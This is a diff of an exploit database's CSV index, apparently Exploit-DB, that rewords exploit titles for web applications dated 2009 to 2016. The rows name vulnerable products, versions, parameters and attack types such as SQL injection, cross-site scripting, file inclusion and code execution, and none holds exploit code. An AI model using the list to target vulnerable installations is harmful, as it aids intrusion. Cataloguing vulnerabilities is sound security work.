34800,platforms/php/webapps/34800.txt,"Typo3 Extension JobControl 2.14.0 - Cross-Site Scripting / SQL Injection",2014-09-27,"Adler Freiheit",php,webapps,0 -34809,platforms/php/webapps/34809.txt,"Tausch Ticket Script 3 - suchauftraege_user.php userid Parameter SQL Injection",2009-07-07,Moudi,php,webapps,0 -34810,platforms/php/webapps/34810.txt,"Tausch Ticket Script 3 - vote.php descr Parameter SQL Injection",2009-07-07,Moudi,php,webapps,0 -34811,platforms/php/webapps/34811.txt,"Linea21 1.2.1 - 'search' Parameter Cross-Site Scripting",2009-07-08,"599eme Man",php,webapps,0 -34812,platforms/php/webapps/34812.html,"Docebo 3.6 - 'description' Parameter Cross-Site Scripting",2010-10-04,"High-Tech Bridge SA",php,webapps,0 +34809,platforms/php/webapps/34809.txt,"Tausch Ticket Script 3 - 'suchauftraege_user.php?userid' SQL Injection",2009-07-07,Moudi,php,webapps,0 +34810,platforms/php/webapps/34810.txt,"Tausch Ticket Script 3 - 'vote.php?descr' SQL Injection",2009-07-07,Moudi,php,webapps,0 +34811,platforms/php/webapps/34811.txt,"Linea21 1.2.1 - 'search' Cross-Site Scripting",2009-07-08,"599eme Man",php,webapps,0 +34812,platforms/php/webapps/34812.html,"Docebo 3.6 - 'description' Cross-Site Scripting",2010-10-04,"High-Tech Bridge SA",php,webapps,0 34813,platforms/php/webapps/34813.txt,"Elxis 2009.2 rev2631 - SQL Injection",2010-10-05,"High-Tech Bridge SA",php,webapps,0 34814,platforms/php/webapps/34814.txt,"SquirrelMail Virtual Keyboard Plugin - 'vkeyboard.php' Cross-Site Scripting",2010-10-05,"Moritz Naumann",php,webapps,0 -34820,platforms/php/webapps/34820.pl,"Joomla! Component Club Manager - 'cm_id' Parameter SQL Injection",2010-10-06,FL0RiX,php,webapps,0 +34820,platforms/php/webapps/34820.pl,"Joomla! Component Club Manager - 'cm_id' SQL Injection",2010-10-06,FL0RiX,php,webapps,0 34817,platforms/windows/webapps/34817.rb,"Microsoft Exchange - IIS HTTP Internal IP Address Disclosure (Metasploit)",2014-09-29,"Nate Power",windows,webapps,0 34818,platforms/php/webapps/34818.html,"OpenFiler 2.99.1 - Cross-Site Request Forgery",2014-09-29,"Dolev Farhi",php,webapps,446 -34975,platforms/php/webapps/34975.txt,"WordPress Plugin SEO Tools 3.0 - 'file' Parameter Directory Traversal",2010-11-08,"John Leitch",php,webapps,0 +34975,platforms/php/webapps/34975.txt,"WordPress Plugin SEO Tools 3.0 - 'file' Directory Traversal",2010-11-08,"John Leitch",php,webapps,0 34976,platforms/php/webapps/34976.txt,"WordPress Plugin Vodpod Video Gallery 3.1.5 - 'vodpod_gallery_thumbs.php' Cross-Site Scripting",2010-11-08,"John Leitch",php,webapps,0 -34977,platforms/php/webapps/34977.txt,"WordPress Plugin jRSS Widget 1.1.1 - 'url' Parameter Information Disclosure",2010-11-08,"John Leitch",php,webapps,0 +34977,platforms/php/webapps/34977.txt,"WordPress Plugin jRSS Widget 1.1.1 - 'url' Information Disclosure",2010-11-08,"John Leitch",php,webapps,0 34827,platforms/php/webapps/34827.txt,"Recipe Script 5.0 - 'First Name' HTML Injection",2009-06-15,"ThE g0bL!N",php,webapps,0 34828,platforms/php/webapps/34828.txt,"Backbone Technology Expression 18.9.2010 - Cross-Site Scripting",2010-10-06,"High-Tech Bridge SA",php,webapps,0 -34833,platforms/php/webapps/34833.txt,"Joomla! / Mambo Component com_trade - 'PID' Parameter Cross-Site Scripting",2010-10-11,FL0RiX,php,webapps,0 +34833,platforms/php/webapps/34833.txt,"Joomla! / Mambo Component com_trade - 'PID' Cross-Site Scripting",2010-10-11,FL0RiX,php,webapps,0 34834,platforms/jsp/webapps/34834.txt,"Oracle Fusion Middleware 10.1.2/10.1.3 - BPEL Console Cross-Site Scripting",2010-10-12,"Alexander Polyakov",jsp,webapps,0 -34837,platforms/php/webapps/34837.txt,"Joomla! Component Jstore - 'Controller' Parameter Local File Inclusion",2010-10-13,jos_ali_joe,php,webapps,0 +34837,platforms/php/webapps/34837.txt,"Joomla! Component Jstore - 'Controller' Local File Inclusion",2010-10-13,jos_ali_joe,php,webapps,0 34839,platforms/cgi/webapps/34839.py,"IPFire - Cgi Web Interface Authenticated Bash Environment Variable Code Injection",2014-10-01,"Claudio Viviani",cgi,webapps,0 34840,platforms/php/webapps/34840.txt,"Ronny CMS 1.1 r935 - Multiple HTML Injection Vulnerabilities",2010-10-13,"High-Tech Bridge SA",php,webapps,0 34841,platforms/php/webapps/34841.txt,"PluXml 5.0.1 - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2010-10-13,"High-Tech Bridge SA",php,webapps,0 34842,platforms/php/webapps/34842.txt,"TWiki 5.0 - bin/view rev Parameter Cross-Site Scripting",2010-10-14,"DOUHINE Davy",php,webapps,0 -34843,platforms/php/webapps/34843.txt,"TWiki 5.0 - bin/login Multiple Parameter Cross-Site Scripting",2010-10-14,"DOUHINE Davy",php,webapps,0 -34845,platforms/php/webapps/34845.txt,"PHP Photo Vote 1.3F - 'page' Parameter Cross-Site Scripting",2009-08-07,Moudi,php,webapps,0 +34843,platforms/php/webapps/34843.txt,"TWiki 5.0 - bin/login Multiple Cross-Site Scripting Vulnerabilities",2010-10-14,"DOUHINE Davy",php,webapps,0 +34845,platforms/php/webapps/34845.txt,"PHP Photo Vote 1.3F - 'page' Cross-Site Scripting",2009-08-07,Moudi,php,webapps,0 34847,platforms/php/webapps/34847.txt,"PHP Easy Shopping Cart 3.1R - 'subitems.php' Cross-Site Scripting",2009-08-07,Moudi,php,webapps,0 -34849,platforms/php/webapps/34849.txt,"AdvertisementManager 3.1 - 'req' Parameter Local/Remote File Inclusion",2010-01-19,indoushka,php,webapps,0 +34849,platforms/php/webapps/34849.txt,"AdvertisementManager 3.1 - 'req' Local/Remote File Inclusion",2010-01-19,indoushka,php,webapps,0 34850,platforms/php/webapps/34850.txt,"eXV2 CMS - Multiple Cross-Site Scripting Vulnerabilities",2010-10-15,LiquidWorm,php,webapps,0 -34851,platforms/php/webapps/34851.txt,"Bacula-Web 5.2.10 - 'joblogs.php jobid Parameter SQL Injection",2014-10-02,wishnusakti,php,webapps,80 +34851,platforms/php/webapps/34851.txt,"Bacula-Web 5.2.10 - 'joblogs.php?jobid' SQL Injection",2014-10-02,wishnusakti,php,webapps,80 34852,platforms/windows/webapps/34852.txt,"Rejetto HTTP File Server (HFS) 2.3a/2.3b/2.3c - Remote Command Execution",2014-10-02,"Daniele Linguaglossa",windows,webapps,80 34854,platforms/php/webapps/34854.txt,"WordPress Plugin All In One WP Security & Firewall 3.8.3 - Persistent Cross-Site Scripting",2014-10-02,Vulnerability-Lab,php,webapps,80 34858,platforms/php/webapps/34858.txt,"RBS Change Complet Open Source 3.6.8 - Cross-Site Request Forgery",2014-10-02,"Krusty Hack",php,webapps,80 @@ -34522,33 +34523,33 @@ id,file,description,date,author,platform,type,port 34864,platforms/asp/webapps/34864.txt,"Epicor Enterprise 7.4 - Multiple Vulnerabilities",2014-10-02,"Fara Rustein",asp,webapps,443 34865,platforms/multiple/webapps/34865.txt,"Moab < 7.2.9 - Authentication Bypass",2014-10-02,"MWR InfoSecurity",multiple,webapps,0 34871,platforms/php/webapps/34871.txt,"eCardMAX FormXP - 'survey_result.php' Cross-Site Scripting",2009-07-15,Moudi,php,webapps,0 -34873,platforms/php/webapps/34873.txt,"Wap-motor - 'image' Parameter Directory Traversal",2009-08-27,Inj3ct0r,php,webapps,0 +34873,platforms/php/webapps/34873.txt,"Wap-motor - 'image' Directory Traversal",2009-08-27,Inj3ct0r,php,webapps,0 34874,platforms/php/webapps/34874.txt,"Skybluecanvas 1.1 r237 - 'admin.php' Multiple Cross-Site Scripting Vulnerabilities",2009-10-15,MaXe,php,webapps,0 -34875,platforms/php/webapps/34875.txt,"QuarkMail - 'tf' Parameter Directory Traversal",2009-08-28,Securitylab.ir,php,webapps,0 +34875,platforms/php/webapps/34875.txt,"QuarkMail - 'tf' Directory Traversal",2009-08-28,Securitylab.ir,php,webapps,0 34876,platforms/php/webapps/34876.txt,"E-Gold Game Series: Pirates of The Caribbean - Multiple SQL Injections",2009-08-27,Moudi,php,webapps,0 34877,platforms/php/webapps/34877.txt,"DigiOz Guestbook 1.7.2 - 'search.php' Cross-Site Scripting",2009-08-26,Moudi,php,webapps,0 34878,platforms/php/webapps/34878.txt,"StandAloneArcade 1.1 - 'gamelist.php' Cross-Site Scripting",2009-08-27,Moudi,php,webapps,0 34882,platforms/php/webapps/34882.html,"sNews 1.7 - 'snews.php' Cross-Site Scripting / HTML Injection",2010-10-19,"High-Tech Bridge SA",php,webapps,0 -34883,platforms/php/webapps/34883.txt,"4Site CMS 2.6 - 'cat' Parameter SQL Injection",2010-10-19,"High-Tech Bridge SA",php,webapps,0 +34883,platforms/php/webapps/34883.txt,"4Site CMS 2.6 - 'cat' SQL Injection",2010-10-19,"High-Tech Bridge SA",php,webapps,0 34884,platforms/php/webapps/34884.txt,"JCE-Tech SearchFeed Script - 'index.php' Cross-Site Scripting",2009-08-26,Moudi,php,webapps,0 -34885,platforms/php/webapps/34885.txt,"Auction RSS Content Script - rss.php id Parameter Cross-Site Scripting",2009-08-26,Moudi,php,webapps,0 -34886,platforms/php/webapps/34886.txt,"Auction RSS Content Script - search.php id Parameter Cross-Site Scripting",2009-08-26,Moudi,php,webapps,0 +34885,platforms/php/webapps/34885.txt,"Auction RSS Content Script - 'rss.php?id' Cross-Site Scripting",2009-08-26,Moudi,php,webapps,0 +34886,platforms/php/webapps/34886.txt,"Auction RSS Content Script - 'search.php?id' Cross-Site Scripting",2009-08-26,Moudi,php,webapps,0 34887,platforms/php/webapps/34887.txt,"JCE-Tech PHP Video Script - 'index.php' Cross-Site Scripting",2009-08-26,Moudi,php,webapps,0 34888,platforms/php/webapps/34888.txt,"UloKI PHP Forum 2.1 - 'search.php' Cross-Site Scripting",2009-08-19,Moudi,php,webapps,0 34890,platforms/php/webapps/34890.txt,"Wiccle Web Builder 2.0 - Multiple Cross-Site Scripting Vulnerabilities",2010-10-21,"Veerendra G.G",php,webapps,0 -34891,platforms/php/webapps/34891.txt,"Micro CMS 1.0 - 'name' Parameter HTML Injection",2010-10-21,"SecPod Research",php,webapps,0 -34892,platforms/php/webapps/34892.txt,"pecio CMS 2.0.5 - 'target' Parameter Cross-Site Scripting",2010-10-21,"Antu Sanadi",php,webapps,0 -34893,platforms/php/webapps/34893.txt,"PHP Scripts Now Multiple Products - bios.php rank Parameter Cross-Site Scripting",2009-07-20,"599eme Man",php,webapps,0 -34894,platforms/php/webapps/34894.txt,"PHP Scripts Now Multiple Products - bios.php rank Parameter SQL Injection",2009-07-20,"599eme Man",php,webapps,0 +34891,platforms/php/webapps/34891.txt,"Micro CMS 1.0 - 'name' HTML Injection",2010-10-21,"SecPod Research",php,webapps,0 +34892,platforms/php/webapps/34892.txt,"pecio CMS 2.0.5 - 'target' Cross-Site Scripting",2010-10-21,"Antu Sanadi",php,webapps,0 +34893,platforms/php/webapps/34893.txt,"PHP Scripts Now (Multiple Products) - 'bios.php rank' Cross-Site Scripting",2009-07-20,"599eme Man",php,webapps,0 +34894,platforms/php/webapps/34894.txt,"PHP Scripts Now (Multiple Products) - 'bios.php rank' SQL Injection",2009-07-20,"599eme Man",php,webapps,0 34895,platforms/cgi/webapps/34895.rb,"Bash CGI - Remote Code Execution (Shellshock) (Metasploit)",2014-10-06,"Fady Mohammed Osman",cgi,webapps,0 34922,platforms/php/webapps/34922.txt,"WordPress Plugin Creative Contact Form 0.9.7 - Arbitrary File Upload",2014-10-08,"Gianni Angelozzi",php,webapps,0 35023,platforms/php/webapps/35023.txt,"Wernhart Guestbook 2001.03.28 - Multiple SQL Injections",2010-11-29,"Aliaksandr Hartsuyeu",php,webapps,0 35024,platforms/php/webapps/35024.txt,"Joomla! Component Catalogue - SQL Injection / Local File Inclusion",2010-11-30,XroGuE,php,webapps,0 -34902,platforms/php/webapps/34902.txt,"PHP Scripts Now Riddles - '/riddles/results.php searchQuery' Parameter Cross-Site Scripting",2009-08-20,Moudi,php,webapps,0 -34903,platforms/php/webapps/34903.txt,"PHP Scripts Now Riddles - '/riddles/list.php catid' Parameter SQL Injection",2009-08-20,Moudi,php,webapps,0 +34902,platforms/php/webapps/34902.txt,"PHP Scripts Now Riddles - '/riddles/results.php?searchQuery' Cross-Site Scripting",2009-08-20,Moudi,php,webapps,0 +34903,platforms/php/webapps/34903.txt,"PHP Scripts Now Riddles - '/riddles/list.php?catid' SQL Injection",2009-08-20,Moudi,php,webapps,0 34904,platforms/php/webapps/34904.txt,"Radvision Scopia - 'entry/index.jsp' Cross-Site Scripting",2009-08-24,"Francesco Bianchino",php,webapps,0 -34905,platforms/php/webapps/34905.txt,"W-Agora 4.2.1 - 'search.php3 bn' Parameter Traversal Local File Inclusion",2010-10-22,MustLive,php,webapps,0 -34906,platforms/php/webapps/34906.txt,"W-Agora 4.2.1 - search.php bn Parameter Cross-Site Scripting",2010-10-22,MustLive,php,webapps,0 +34905,platforms/php/webapps/34905.txt,"W-Agora 4.2.1 - 'search.php3?bn' Traversal Local File Inclusion",2010-10-22,MustLive,php,webapps,0 +34906,platforms/php/webapps/34906.txt,"W-Agora 4.2.1 - 'search.php?bn' Cross-Site Scripting",2010-10-22,MustLive,php,webapps,0 34907,platforms/multiple/webapps/34907.txt,"IBM Tivoli Access Manager for E-Business - ivt/ivtserver parm1 Parameter Cross-Site Scripting",2010-10-22,IBM,multiple,webapps,0 34908,platforms/multiple/webapps/34908.txt,"IBM Tivoli Access Manager for E-Business - ibm/wpm/acl method Parameter Cross-Site Scripting",2010-10-22,IBM,multiple,webapps,0 34909,platforms/multiple/webapps/34909.txt,"IBM Tivoli Access Manager for E-Business - ibm/wpm/domain method Parameter Cross-Site Scripting",2010-10-22,IBM,multiple,webapps,0 @@ -34568,12 +34569,12 @@ id,file,description,date,author,platform,type,port 34930,platforms/php/webapps/34930.txt,"Sitecore CMS 6.0.0 rev. 090120 - 'default.aspx' Cross-Site Scripting",2009-06-03,intern0t,php,webapps,0 34933,platforms/php/webapps/34933.txt,"Flatnux 2009-03-27 - Multiple Cross-Site Scripting Vulnerabilities",2009-06-03,intern0t,php,webapps,0 34934,platforms/php/webapps/34934.pl,"Joomla! Component Projects 'com_projects' - SQL Injection / Local File Inclusion",2010-10-27,jos_ali_joe,php,webapps,0 -34935,platforms/php/webapps/34935.txt,"LES PACKS - 'ID' Parameter SQL Injection",2010-10-27,Cru3l.b0y,php,webapps,0 +34935,platforms/php/webapps/34935.txt,"LES PACKS - 'ID' SQL Injection",2010-10-27,Cru3l.b0y,php,webapps,0 34936,platforms/asp/webapps/34936.txt,"i-Gallery 3.4/4.1 - 'streamfile.asp' Multiple Directory Traversal Vulnerabilities",2009-06-03,"Stefano Angaran",asp,webapps,0 34937,platforms/php/webapps/34937.txt,"Feindura CMS Groupware - Multiple Local File Inclusion / Cross-Site Scripting Vulnerabilities",2010-10-28,Justanotherhacker.com,php,webapps,0 34939,platforms/php/webapps/34939.txt,"W-Agora 4.1.5 - Local File Inclusion / Cross-Site Scripting",2010-10-27,MustLive,php,webapps,0 34940,platforms/php/webapps/34940.txt,"212Cafe WebBoard 2.90 Beta - 'view.php' Directory Traversal",2009-05-29,MrDoug,php,webapps,0 -34941,platforms/php/webapps/34941.txt,"Intergo Arcade Trade Script 1.0 - 'q' Parameter Cross-Site Scripting",2009-05-25,SmOk3,php,webapps,0 +34941,platforms/php/webapps/34941.txt,"Intergo Arcade Trade Script 1.0 - 'q' Cross-Site Scripting",2009-05-25,SmOk3,php,webapps,0 34942,platforms/php/webapps/34942.txt,"Elastix 2.0.2 - Multiple Cross-Site Scripting Vulnerabilities",2010-11-01,"dave b",php,webapps,0 34944,platforms/php/webapps/34944.txt,"SmartOptimizer - Null Character Remote Information Disclosure",2010-11-01,"Francois Harvey",php,webapps,0 34946,platforms/php/webapps/34946.txt,"WordPress Plugin cformsII 11.5/13.1 - 'lib_ajax.php' Multiple Cross-Site Scripting Vulnerabilities",2010-11-01,"Wagner Elias",php,webapps,0 @@ -34583,7 +34584,7 @@ id,file,description,date,author,platform,type,port 34955,platforms/php/webapps/34955.txt,"Joomla! 1.5.x - SQL Error Information Disclosure",2010-11-05,"YGN Ethical Hacker Group",php,webapps,0 34956,platforms/hardware/webapps/34956.txt,"Bosch Security Systems DVR 630/650/670 Series - Multiple Vulnerabilities",2014-10-14,dun,hardware,webapps,0 34957,platforms/ios/webapps/34957.txt,"PayPal Inc BB #85 MB iOS 4.6 - Authentication Bypass",2014-10-14,Vulnerability-Lab,ios,webapps,0 -35022,platforms/php/webapps/35022.txt,"4homepages 4Images 1.7.x - 'categories.php' Parameter SQL Injection",2010-11-29,"Ahmed Atif",php,webapps,0 +35022,platforms/php/webapps/35022.txt,"4homepages 4Images 1.7.x - 'categories.php' SQL Injection",2010-11-29,"Ahmed Atif",php,webapps,0 34958,platforms/php/webapps/34958.py,"Croogo 2.0.0 - Arbitrary PHP Code Execution",2014-10-14,LiquidWorm,php,webapps,0 34959,platforms/php/webapps/34959.txt,"Croogo 2.0.0 - Multiple Persistent Cross-Site Scripting Vulnerabilities",2014-10-14,LiquidWorm,php,webapps,0 34981,platforms/ios/webapps/34981.txt,"Indeed Job Search 2.5 iOS API - Multiple Vulnerabilities",2014-10-15,Vulnerability-Lab,ios,webapps,0 @@ -34598,7 +34599,7 @@ id,file,description,date,author,platform,type,port 34994,platforms/cgi/webapps/34994.txt,"OpenWrt 10.03 - Multiple Cross-Site Scripting Vulnerabilities",2010-11-13,"dave b",cgi,webapps,0 34995,platforms/php/webapps/34995.txt,"Simea CMS - 'index.php' SQL Injection",2010-11-16,Cru3l.b0y,php,webapps,0 34984,platforms/php/webapps/34984.py,"Drupal 7.0 < 7.31 - SQL Injection (1)",2014-10-16,fyukyuk,php,webapps,0 -34988,platforms/php/webapps/34988.txt,"PHPShop 2.1 EE - 'name_new' Parameter Cross-Site Scripting",2010-11-10,MustLive,php,webapps,0 +34988,platforms/php/webapps/34988.txt,"PHPShop 2.1 EE - 'name_new' Cross-Site Scripting",2010-11-10,MustLive,php,webapps,0 34989,platforms/php/webapps/34989.txt,"WeBid 0.85P1 - Multiple Input Validation Vulnerabilities",2010-11-10,"John Leitch",php,webapps,0 34990,platforms/php/webapps/34990.txt,"Ricoh Web Image Monitor 2.03 - Cross-Site Scripting",2010-11-09,thelightcosine,php,webapps,0 34996,platforms/php/webapps/34996.txt,"Raised Eyebrow CMS - 'venue.php' SQL Injection",2010-11-16,Cru3l.b0y,php,webapps,0 @@ -34606,14 +34607,14 @@ id,file,description,date,author,platform,type,port 34993,platforms/php/webapps/34993.php,"Drupal 7.32 - SQL Injection (PHP)",2014-10-17,"Dustin Dörr",php,webapps,0 35004,platforms/php/webapps/35004.txt,"CompactCMS 1.4.1 - Multiple Cross-Site Scripting Vulnerabilities (1)",2010-11-18,"High-Tech Bridge SA",php,webapps,0 35008,platforms/cgi/webapps/35008.txt,"Hot Links SQL 3.2 - 'report.cgi' SQL Injection",2010-11-22,"Aliaksandr Hartsuyeu",cgi,webapps,0 -35012,platforms/multiple/webapps/35012.txt,"ZYXEL P-660R-T1 V2 - 'HomeCurrent_Date' Parameter Cross-Site Scripting",2010-11-23,"Usman Saeed",multiple,webapps,0 +35012,platforms/multiple/webapps/35012.txt,"ZYXEL P-660R-T1 V2 - 'HomeCurrent_Date' Cross-Site Scripting",2010-11-23,"Usman Saeed",multiple,webapps,0 35015,platforms/cgi/webapps/35015.txt,"SimpLISTic SQL 2.0 - 'email.cgi' Cross-Site Scripting",2010-11-24,"Aliaksandr Hartsuyeu",cgi,webapps,0 -35016,platforms/php/webapps/35016.txt,"Easy Banner 2009.05.18 - 'member.php' Multiple Parameter SQL Injection / Authentication Bypass",2010-11-26,"Aliaksandr Hartsuyeu",php,webapps,0 -35017,platforms/php/webapps/35017.txt,"Easy Banner 2009.05.18 - 'index.php' Multiple Parameter Cross-Site Scripting",2010-11-26,"Aliaksandr Hartsuyeu",php,webapps,0 -35025,platforms/php/webapps/35025.html,"Car Portal 2.0 - 'car_make' Parameter Cross-Site Scripting",2010-11-29,"Underground Stockholm",php,webapps,0 -35026,platforms/php/webapps/35026.txt,"Joomla! Component com_storedirectory - 'id' Parameter SQL Injection",2010-11-30,XroGuE,php,webapps,0 +35016,platforms/php/webapps/35016.txt,"Easy Banner 2009.05.18 - 'member.php' Multiple SQL Injection / Authentication Bypass",2010-11-26,"Aliaksandr Hartsuyeu",php,webapps,0 +35017,platforms/php/webapps/35017.txt,"Easy Banner 2009.05.18 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2010-11-26,"Aliaksandr Hartsuyeu",php,webapps,0 +35025,platforms/php/webapps/35025.html,"Car Portal 2.0 - 'car_make' Cross-Site Scripting",2010-11-29,"Underground Stockholm",php,webapps,0 +35026,platforms/php/webapps/35026.txt,"Joomla! Component com_storedirectory - 'id' SQL Injection",2010-11-30,XroGuE,php,webapps,0 35027,platforms/php/webapps/35027.txt,"E-lokaler CMS 2 - Admin Login Multiple SQL Injections",2010-11-26,ali_err0r,php,webapps,0 -35028,platforms/php/webapps/35028.txt,"SmartBox - 'page_id' Parameter SQL Injection",2010-11-26,KnocKout,php,webapps,0 +35028,platforms/php/webapps/35028.txt,"SmartBox - 'page_id' SQL Injection",2010-11-26,KnocKout,php,webapps,0 35031,platforms/asp/webapps/35031.txt,"BugTracker.NET 3.4.4 - SQL Injection / Cross-Site Scripting",2010-11-30,BugTracker.NET,asp,webapps,0 35035,platforms/cgi/webapps/35035.txt,"AWStats 6.x - Apache Tomcat Configuration File Arbitrary Command Execution",2010-11-30,StenoPlasma,cgi,webapps,0 35036,platforms/php/webapps/35036.txt,"Joomla! Component Annuaire - Parameter SQL Injection",2010-12-02,"Ashiyane Digital Security Team",php,webapps,0 @@ -34629,18 +34630,18 @@ id,file,description,date,author,platform,type,port 35047,platforms/hardware/webapps/35047.txt,"Dell SonicWALL Gms 7.2.x - Code Injection",2014-10-23,Vulnerability-Lab,hardware,webapps,0 35048,platforms/asp/webapps/35048.txt,"Techno Dreams Articles & Papers Package 2.0 - 'ArticlesTablelist.asp' SQL Injection",2010-12-04,R4dc0re,asp,webapps,0 35049,platforms/asp/webapps/35049.txt,"Techno Dreams FAQ Manager Package 1.0 - 'faqlist.asp' SQL Injection",2010-12-04,R4dc0re,asp,webapps,0 -35050,platforms/php/webapps/35050.txt,"Alguest 1.1 - 'start' Parameter SQL Injection",2010-12-06,"Aliaksandr Hartsuyeu",php,webapps,0 +35050,platforms/php/webapps/35050.txt,"Alguest 1.1 - 'start' SQL Injection",2010-12-06,"Aliaksandr Hartsuyeu",php,webapps,0 35052,platforms/php/webapps/35052.txt,"Magento Server MAGMI Plugin 0.7.17a - Remote File Inclusion",2014-10-25,"Parvinder Bhasin",php,webapps,0 35566,platforms/php/webapps/35566.txt,"Yaws-Wiki 1.88-1 - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2011-04-04,"Michael Brooks",php,webapps,0 35056,platforms/hardware/webapps/35056.txt,"Dell EqualLogic Storage - Directory Traversal",2014-10-25,"XLabs Security",hardware,webapps,0 35057,platforms/php/webapps/35057.py,"WordPress Plugin 0.9.7 / Joomla! Component 2.0.0 Creative Contact Form - Arbitrary File Upload",2014-10-25,"Claudio Viviani",php,webapps,0 35127,platforms/jsp/webapps/35127.txt,"Progress OpenEdge 11.2 - Directory Traversal",2014-10-31,"XLabs Security",jsp,webapps,9090 -35060,platforms/php/webapps/35060.txt,"Aigaion 1.3.4 - 'ID' Parameter SQL Injection",2010-12-07,KnocKout,php,webapps,0 +35060,platforms/php/webapps/35060.txt,"Aigaion 1.3.4 - 'ID' SQL Injection",2010-12-07,KnocKout,php,webapps,0 35063,platforms/php/webapps/35063.txt,"Zimplit CMS - 'zimplit.php' File Parameter Cross-Site Scripting",2010-12-07,"High-Tech Bridge SA",php,webapps,0 -35064,platforms/php/webapps/35064.txt,"Zimplit CMS - English_manual_version_2.php client Parameter Cross-Site Scripting",2010-12-07,"High-Tech Bridge SA",php,webapps,0 +35064,platforms/php/webapps/35064.txt,"Zimplit CMS - 'English_manual_version_2.php?client' Cross-Site Scripting",2010-12-07,"High-Tech Bridge SA",php,webapps,0 35065,platforms/asp/webapps/35065.txt,"SolarWinds Orion Network Performance Monitor (NPM) 10.1 - Multiple Cross-Site Scripting Vulnerabilities",2010-12-07,x0skel,asp,webapps,0 -35066,platforms/php/webapps/35066.txt,"WordPress Plugin Processing Embed 0.5 - 'pluginurl' Parameter Cross-Site Scripting",2010-12-08,"John Leitch",php,webapps,0 -35067,platforms/php/webapps/35067.txt,"WordPress Plugin Safe Search - 'v1' Parameter Cross-Site Scripting",2010-12-08,"John Leitch",php,webapps,0 +35066,platforms/php/webapps/35066.txt,"WordPress Plugin Processing Embed 0.5 - 'pluginurl' Cross-Site Scripting",2010-12-08,"John Leitch",php,webapps,0 +35067,platforms/php/webapps/35067.txt,"WordPress Plugin Safe Search - 'v1' Cross-Site Scripting",2010-12-08,"John Leitch",php,webapps,0 35072,platforms/php/webapps/35072.txt,"Drupal Module Embedded Media Field/Media 6.x : Video Flotsam/Media: Audio Flotsam - Multiple Vulnerabilities",2010-12-08,"Justin Klein Keane",php,webapps,0 35073,platforms/php/webapps/35073.txt,"WordPress Plugin CP Multi View Event Calendar 1.01 - SQL Injection",2014-10-27,"Claudio Viviani",php,webapps,80 35075,platforms/hardware/webapps/35075.txt,"CBN CH6640E/CG6640E Wireless Gateway Series - Multiple Vulnerabilities",2014-10-27,LiquidWorm,hardware,webapps,0 @@ -34650,14 +34651,14 @@ id,file,description,date,author,platform,type,port 40333,platforms/php/webapps/40333.txt,"WordPress Plugin RB Agency 2.4.7 - Local File Disclosure",2016-09-05,"Persian Hack Team",php,webapps,80 35082,platforms/ios/webapps/35082.txt,"WebDisk+ 2.1 iOS - Code Execution",2014-10-27,Vulnerability-Lab,ios,webapps,1861 35083,platforms/ios/webapps/35083.txt,"Folder Plus 2.5.1 iOS - Persistent Cross-Site Scripting",2014-10-27,Vulnerability-Lab,ios,webapps,0 -35084,platforms/php/webapps/35084.txt,"WordPress Plugin Twitter Feed - 'url' Parameter Cross-Site Scripting",2010-12-07,"John Leitch",php,webapps,0 +35084,platforms/php/webapps/35084.txt,"WordPress Plugin Twitter Feed - 'url' Cross-Site Scripting",2010-12-07,"John Leitch",php,webapps,0 35085,platforms/cgi/webapps/35085.txt,"WWWThread 5.0.8 Pro - 'showflat.pl' Cross-Site Scripting",2010-12-09,"Aliaksandr Hartsuyeu",cgi,webapps,0 35087,platforms/php/webapps/35087.txt,"net2ftp 0.98 (stable) - 'admin1.template.php' Local/Remote File Inclusion",2010-12-09,"Marcin Ressel",php,webapps,0 -35088,platforms/php/webapps/35088.txt,"PHP State - 'id' Parameter SQL Injection",2010-12-09,jos_ali_joe,php,webapps,0 -35089,platforms/php/webapps/35089.txt,"Joomla! Component Jeformcr - 'id' Parameter SQL Injection",2010-12-09,FL0RiX,php,webapps,0 -35090,platforms/php/webapps/35090.txt,"Joomla! Component JExtensions Property Finder - 'sf_id' Parameter SQL Injection",2010-12-10,FL0RiX,php,webapps,0 +35088,platforms/php/webapps/35088.txt,"PHP State - 'id' SQL Injection",2010-12-09,jos_ali_joe,php,webapps,0 +35089,platforms/php/webapps/35089.txt,"Joomla! Component Jeformcr - 'id' SQL Injection",2010-12-09,FL0RiX,php,webapps,0 +35090,platforms/php/webapps/35090.txt,"Joomla! Component JExtensions Property Finder - 'sf_id' SQL Injection",2010-12-10,FL0RiX,php,webapps,0 35091,platforms/php/webapps/35091.txt,"ManageEngine EventLog Analyzer 6.1 - Multiple Cross-Site Scripting Vulnerabilities",2010-12-10,"Rob Kraus",php,webapps,0 -35093,platforms/cgi/webapps/35093.txt,"BizDir 05.10 - 'f_srch' Parameter Cross-Site Scripting",2010-12-10,"Aliaksandr Hartsuyeu",cgi,webapps,0 +35093,platforms/cgi/webapps/35093.txt,"BizDir 05.10 - 'f_srch' Cross-Site Scripting",2010-12-10,"Aliaksandr Hartsuyeu",cgi,webapps,0 35094,platforms/php/webapps/35094.txt,"slickMsg 0.7-alpha - 'top.php' Cross-Site Scripting",2010-12-10,"Aliaksandr Hartsuyeu",php,webapps,0 35096,platforms/php/webapps/35096.txt,"Joomla! Component com_mailto - Multiple Cross-Site Scripting Vulnerabilities",2010-12-10,MustLive,php,webapps,0 35097,platforms/php/webapps/35097.txt,"Joomla! Component com_redirect 1.5.19 - Local File Inclusion",2010-12-13,jos_ali_joe,php,webapps,0 @@ -34680,26 +34681,26 @@ id,file,description,date,author,platform,type,port 35118,platforms/php/webapps/35118.txt,"PHPRS - 'model-kits.php' SQL Injection",2010-12-16,KnocKout,php,webapps,0 35120,platforms/php/webapps/35120.txt,"Radius Manager 3.6 - Multiple Cross-Site Scripting Vulnerabilities",2010-12-17,"Rodrigo Rubira Branco",php,webapps,0 35121,platforms/php/webapps/35121.txt,"Social Share - Multiple Cross-Site Scripting Vulnerabilities",2010-12-17,"Aliaksandr Hartsuyeu",php,webapps,0 -35122,platforms/php/webapps/35122.txt,"Social Share - 'postid' Parameter SQL Injection",2010-12-20,"Aliaksandr Hartsuyeu",php,webapps,0 +35122,platforms/php/webapps/35122.txt,"Social Share - 'postid' SQL Injection",2010-12-20,"Aliaksandr Hartsuyeu",php,webapps,0 35123,platforms/php/webapps/35123.txt,"Mafya Oyun Scrpti - 'profil.php' SQL Injection",2010-12-20,"DeadLy DeMon",php,webapps,0 35124,platforms/php/webapps/35124.txt,"FreeNAS 0.7.2.5543 - 'index.php' Multiple Cross-Site Scripting 